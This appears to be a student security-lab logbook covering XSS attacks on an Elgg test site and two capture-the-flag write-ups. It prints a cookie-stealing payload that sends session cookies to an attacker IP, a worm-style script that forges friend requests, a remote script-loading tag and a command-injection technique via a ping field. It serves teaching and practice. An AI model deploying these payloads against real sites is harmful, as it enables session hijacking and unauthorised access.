# LOGBOOK 10

Tasks #1 to #4

## Task #1

To embed a JavaScript program in our profile, we typed `<script>alert('XSS');</script>` into the brief description field of the profile editing page.

![](https://i.imgur.com/FWACGlw.png)

When we now view our profile, the script is executed and an alert box showing `XSS` appears.

![](https://i.imgur.com/VynyhR9.png)

## Task #2

To display a user's cookies, we put the following script in the brief description section of our profile: `<script>alert(document.cookie);</script>`

![](https://i.imgur.com/wZUOGra.png)

Now, whenever someone visits our profile, the script runs in the visitor's browser and shows the visitor's own cookies in an alert box.

![](https://i.imgur.com/wIClRFh.png)

## Task #3

To steal a victim's cookies, we added the following script to our profile: `<script>document.write('<img src=http://10.9.0.1:5555?c=' + escape(document.cookie) + ' >'); </script>`

![](https://i.imgur.com/QVyZuE2.png)

Now, when someone visits our profile, their browser sends an HTTP GET request to the attacker's machine (IP 10.9.0.1, port 5555) to fetch what it believes is an image; instead of fetching anything useful, the request carries the victim's cookies in its query string.
To view this request, and the cookies it carries, we ran netcat with `nc -lknv 5555` to listen for incoming connections on port 5555. When someone visits our profile we receive:

```
GET /?c=system%3DPW%3B%20caf_ipaddr%3D193.136.33.109%3B%20country%3DPT%3B%20city%3D%22Porto%22%3B%20traffic_target%3Dgd%3B%20__gsas%3DID%3Df6512463016314d4%3AT%3D1669367385%3AS%3DALNI_MZeOvQ-ZAxy0yoBfMplqFLoiuOObw%3B%20pvisitor%3Df8dd5976-1048-4fe6-961b-2e81b42f3156%3B%20Elgg%3D8plf8p08fmoguchv83gidopggi%3B%20elggperm%3Dz1RDjHcJwufS3wbA5j1n1v9HyO8E8l2d HTTP/1.1
Host: 10.9.0.1:5555
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.seed-server.com/profile/boby
```

The query string is the URL-encoded value of `document.cookie`; the `Elgg` cookie in it is the victim's session identifier, which is all an attacker needs to take over the session. This works only because the cookies are readable from JavaScript: a cookie set with the `HttpOnly` flag would not appear in `document.cookie`.

![](https://i.imgur.com/yufad7Y.png)

## Task #4

To replicate the Samy worm we first needed to discover which HTTP GET request the browser sends when a user adds someone as a friend. We logged in as Alice and added Samy as a friend manually; with Firefox's HTTP Header Live extension we captured the following request:

![](https://i.imgur.com/t5FGXxj.png)

The request was sent to the URL `http://www.seed-server.com/action/friends/add?friend=59&__elgg_ts=1669370236&__elgg_token=wQdylCWnRXXtVSRRdTvSqg&__elgg_ts=1669370236&__elgg_token=wQdylCWnRXXtVSRRdTvSqg` (Elgg appends the two security parameters twice; one copy is enough), that is:

`'http://www.seed-server.com/action/friends/add?friend=' + friendId + ts + token`

where:

- `friendId = 59`: as the captured request shows, Samy's id is 59.
- `ts = '&__elgg_ts=' + elgg.security.token.__elgg_ts`: the parameter name followed by the timestamp of the current user's token, read from the page's JavaScript state.
- `token = '&__elgg_token=' + elgg.security.token.__elgg_token`: the parameter name followed by the current user's security token, read from the same object.
So our script should look like this:

```javascript
<script type="text/javascript">
window.onload = function () {
    var Ajax = null;
    var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
    // Construct the HTTP request to add Samy as a friend.
    var sendurl = 'http://www.seed-server.com/action/friends/add?friend=59' + ts + token;
    // Create and send the Ajax request to add the friend.
    Ajax = new XMLHttpRequest();
    Ajax.open("GET", sendurl, true);
    Ajax.send();
}
</script>
```

To check that the script works, we removed Samy from Alice's friends, logged in as Samy and added the script to his profile, in the About Me section, in text mode.

![](https://i.imgur.com/ffK421H.png)

Then we logged back in as Alice. Here we can see that Samy is not her friend:

![](https://i.imgur.com/g3pDguV.png)

Next we visited Samy's profile; note that we did not click the 'Add Friend' button:

![](https://i.imgur.com/7zfRmLt.png)

Finally, going back to Alice's friend list, Samy is there:

![](https://i.imgur.com/vEC0vZ7.png)

Answering the questions:

- Both lines read Elgg's anti-CSRF values from the page's JavaScript state so that our request is accepted as legitimate. Line 1 is the timestamp (`__elgg_ts`) at which the token was issued; line 2 is the secret token (`__elgg_token`) tied to that timestamp and to the user's session, which the server recomputes and compares before executing the action. Their purpose is to reject requests forged from another site, which cannot read these values. Our script, however, runs inside the victim's own page, in the same origin, so it can read both values and attach them, and the server cannot distinguish the forged request from a genuine click on 'Add Friend'. This is why a CSRF token is no defence against XSS.
- Without text mode the attack would not work as written: the editor encodes the special characters of the script before the description is submitted, so the tags reach the page as plain text and the code never runs. That encoding is done in the browser, though, so it can be bypassed by sending the edit request to the server with the raw script in the body (for example by modifying the request in the browser's developer tools or in an intercepting proxy). A convenient payload for that is a short tag that loads the script from a server we control: `<script type="text/javascript" src="http://www.example.com/myscripts.js"></script>` where http://www.example.com/myscripts.js is the URL where the malicious script is hosted.
This way the page will fetch the script and add it to the page.

# CTF Challenge 1

- On the website, after we submit a request, it is always disapproved once the two minutes pass. We noticed, however, that there is a button which changes the state of the request and hands out the flag, but it only works for someone with admin privileges, who can enable it and press it.

![](https://i.imgur.com/nC0MWg5.png)

- We also noticed that the input field has no validation or output encoding, which allows XSS. So we can inject a script that changes the state of the button, gets our request approved and gives us the flag.

![](https://i.imgur.com/GjdPcb4.png)

- By inspecting the element we saw that the button is disabled and has `id="giveflag"`, so we need a script that enables and clicks that button.

![](https://i.imgur.com/mqyym6n.png)

- After enabling the button ourselves we noticed that we do not have admin privileges, so we need the admin to click it for us. Because the injected script runs in the browser of whoever views our request, it will run with the admin's privileges when the admin reviews it.

![](https://i.imgur.com/p5QaDUM.png)

![](https://i.imgur.com/VXwJd1o.png)

- We did so with the following script, which gave us the flag.

![](https://i.imgur.com/TLmu8Wc.png)

![](https://i.imgur.com/VgYNMSa.png)

# CTF Challenge 2

- Looking at the site we see that we have access to a login form and a button to check the network status.

![](https://i.imgur.com/7YbTXS8.png)

- The network status page has an input form to ping a host and a button that shows a speed report with a silly gif.

![](https://i.imgur.com/jQ3v4zW.png)

- We suspected the ping feature is vulnerable: it uses the Linux `ping` utility to send packets to the host and verify connectivity, and the host typed into the form did not appear to be validated before being passed to that command. After entering the host `0` it indeed returned the ping output for that machine.
![](https://i.imgur.com/XnoHxz9.png)

- Since our input reaches the command without validation, we can use this submit functionality to inject extra commands and make the host response include the `/flags/flag.txt` file.
- Because the input is handed to a shell, we can chain commands with `;` and navigate the file system freely with `ls` and `cd`.

![](https://i.imgur.com/0EhDBOF.png)

![](https://i.imgur.com/nXSL1Wl.png)

- By changing the current directory to outside the website code with `cd ..;` followed by `ls;` we reached the point where the flags folder was visible.

![](https://i.imgur.com/33bkY0w.png)

![](https://i.imgur.com/2uZweRd.png)

- So we could finally execute the command that prints the flag.

![](https://i.imgur.com/Jh3qnil.png)

![](https://i.imgur.com/gxFFxcM.png)